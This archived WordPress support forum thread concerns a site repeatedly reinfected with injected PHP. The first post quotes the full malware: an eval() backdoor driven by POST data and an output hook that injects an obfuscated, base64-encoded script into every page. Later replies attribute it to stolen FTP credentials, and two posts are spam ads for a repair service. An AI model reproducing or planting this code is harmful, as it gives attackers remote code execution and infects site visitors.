WordPress.org

Ready to get started?Download WordPress

Forums

Always-returning Virus- help! (8 posts)

  1. Jenniiisz
    Member
    Posted 5 years ago #

    Hi,

    I hope I'm posting my "question" in the right category.

    Recently my web site http://twilightsweden.se has been attacked by several viruses. A "mean code" hacks itself into the web site and stays attached to all the index-files.
    (I have had virus attacks before, but have managed to get them away, which this won't)

    I have deleted the code, for it hours later to come back. I have changed password for my "login-panel" on my web host. But it doesn't help. The virus always returns!

    Seriously, I need your help! I've been in contact with my web host and its supporters but I always get put in a misery position. They always tell me to look up information on my own and contact the "support-team" for the script.

    Just minutes ago I was in contact with them again. And they wrote:

    "It is possible that your wordpress scripts is injected with the virus because of security holes there. It is called Remote SQL Injection."

    Is there a plugin that could be installed against this horrible stuff?

    This is the code that is included in all the index-files:

    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzY29iQXJRV3JpcHRTUiUyMHNyY1FXciUzREUyJTJGJTJGOW9iQTQlMkVRV3IyNEUyNyUyRW9iQTIlMkVFMjE5ZExONSUyRjNFakUycXVlcnF0UXlvYkElMkVqc1FXciUzRSUzQyUyRnNFMmNyM0VpRTJwb2JBdFBLMSUzRScpLnJlcGxhY2UoL0UyfG9iQXwzRXxkTE58UEsxfHF0UXxTUnxRV3IvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

    So, I hope you can help me. This is quite devastating considering all my visitors. They're depending on my web site and I hate it when it doesn't work for them.

    Help is highly appreciated, as mentioned.

    NOTE: I'm currently running the most recent version of WordPress!

    Sincerely,
    Jennifer

  2. logonfixit
    Member
    Posted 5 years ago #

    The tech can look your problem up, he won't charge u unless he can fix the problem.. He's the best..

  3. logonfixit
    Member
    Posted 5 years ago #

    I had a bad virus and I was giving up on it.. I went to http://logonfixit.com you have nothing to lose. Everything to gain.. I hope you the best.

  4. meetar
    Member
    Posted 4 years ago #

    I'm interested in the solution to this as well. How did somebody get access to my files in the first place?

    And is spam the best this forum can do? WordPress is really looking bad here.

  5. whooami
    Member
    Posted 4 years ago #

    See my reply here:

    http://wordpress.org/support/topic/266038?replies=4

    <?php if(!function_exists('tmp_lkojfghx'))

    that particular code is being injected into your files via the FTP protocol. If youre on a host that uses cpanel, you can actually see the activity in your FTP logs.

    Make sure that after you have cleaned up the site that you change your FTP password. Thats VERY important.

    You also should do complete virus and malware scans on any pcs that you have accessed your site from.

  6. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    pjrich: We try to monitor spam in the forum and remove it, but we don't see everything. If you see spam or anything else a mod should look at, tag the thread with "modlook" and one will notice it quickly.

  7. mattwalters
    Member
    Posted 4 years ago #

    As others have said, make sure you're getting your FTP password changed. A site I worked on was hacked with almost the exact same code recently and they were getting in via the FTP account. Also make sure you have no key loggers / viruses, etc on your computer (or the computer of anyone with access to your account).

    I wrote a plugin to help monitor for things like this in the future if you'd like to take a look at it:

    http://mattwalters.net/projects/wordpress-file-monitor/

  8. whooami
    Member
    Posted 4 years ago #

    I hear an echo.

Topic Closed

This topic has been closed to new replies.

About this Topic